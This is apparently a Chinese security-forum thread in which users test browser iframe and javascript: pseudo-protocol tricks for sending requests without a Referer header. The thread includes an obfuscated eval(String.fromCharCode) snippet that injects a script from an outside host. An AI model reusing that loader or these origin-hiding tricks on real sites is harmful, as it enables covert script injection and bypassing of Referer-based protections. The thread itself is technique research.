自己javascript构造get或post试试呢

Ajax是不行的，再往底层一点去，据说WinHttp可以。

另外再引入一个脚本(语言任意，能构造HTTP请求即可)，把相关参数传入，构造的HTTP请求里字段就随便玩了。

必须浏览器里一层找到方法 好像没有特别好的 用media player?

<iframe src="data:text/html,<script src=http://www.baidu.com></script>">
http://jsbin.com/eduyid/
不过IE不支持:(

@Sogili 是啊，就是想找个通用的方法

<iframe id="aa" src=""></iframe>
<script>
document.getElementById("aa").src='javascript:"<html><body>wooyun.org<scr'+'ipt>eval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,48,44,49,49,49,44,52,54,44,49,48,54,44,49,49,53,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))</scr'+'ipt></body></html>"';
</script>

= = 上面代码好像没显示完整。。。

<iframe id="aa" src=""></iframe>
<script>
document.getElementById("aa").src='javascript:"<html><body>wooyun.org<scr'+'ipt>eval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,48,44,49,49,49,44,52,54,44,49,48,54,44,49,49,53,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))</scr'+'ipt></body></html>"';
</script>

看热闹学习东西

原理是利用 xxx.src='javascript:"HTML代码的方式"'; 可以去掉refer

@gainover 你已经超越神了。。。 轻松的绕过 0.0 妙

@gainover 顶

@gainover  表示IE下还是有referer啊

@xsser 无码无真相，球media player的

围观！！！！！！！

@lanz
<iframe src="javascript:'<script src=http://www.baidu.com></script>'"></iframe>
这样呢?

@gainover 我要送你乌云币！

@lanz Wo zheli zhuabao meiyOu refer a.....

@gainover 我这也有,但用我在楼上留的代码就没有:(

@lanz @Sogili IE几呢？ 我IE8 试的是没 refer的 。。

@请叫我大神 ftp很好用，火狐不支持，配合@Sogili 的方法做个判断，差不多了！

@gainover IE8

about:blank页发起的请求没referer

@Sogili = = 这么奇怪， 难道是某个补丁补掉了？

@rayh4c show me the code，wtf

@gainover 膜拜大牛

@请叫我大神 src等于空，都是about:blank页，空白页，在空白页里发起请求当然没referer，关键在于此。

@rayh4c = =  如果write了就会有referer

@Sogili write会有是DOM对象关联了about:blank页的父窗口的原因，可以找个非about:blank页用这些方法试试，应该会有referer。

<iframe src="" id=x></iframe>
<script defer>
x.document.body.innerHTML='-<script defer src=http://www.baidu.com><\/script>';
</script>

@Sogili - -!! 我的意思是你可以找个正常网站用伪协议把下面的代码注进去，肯定会有referer

javascript:'<script src=http://www.baidu.com><\/script>'

你这个代码如果是在非about:blank页肯定会有referer，用DOM调就有父子窗口关系了。

@rayh4c 我这测试是没有:)

@rayh4c write有,innerHTML无 :(

@Sogili 确实没有，X动态添加的还是about:blank，Y页write后就不是about:blank了。

<iframe src="" id=x></iframe>
<script defer>
x.document.body.innerHTML='-<script defer>alert(\'x:\'+window.parent.x.location)<\/script>';
</script>

<iframe src="" id=y></iframe>
<script defer>
y.document.write('-<script defer>alert(\'y:\'+window.parent.y.location)<\/script>');
</script>

@rayh4c 嗯,的确

@Sogili 回寝室后，又测试了一下， 经过测试，这样写没refer。 看来这里不能用JS再动态调用一次，只能直接<script>插入了。

@Sogili @gainover  伺候好了IE，ff又不干了，此事难两全哪，还是直接用https省事

要是想拿到返回数据喃？

@Zvall http://zone.wooyun.org/upload/avatar/avatar_686_b.jpg 头像猜拿到的？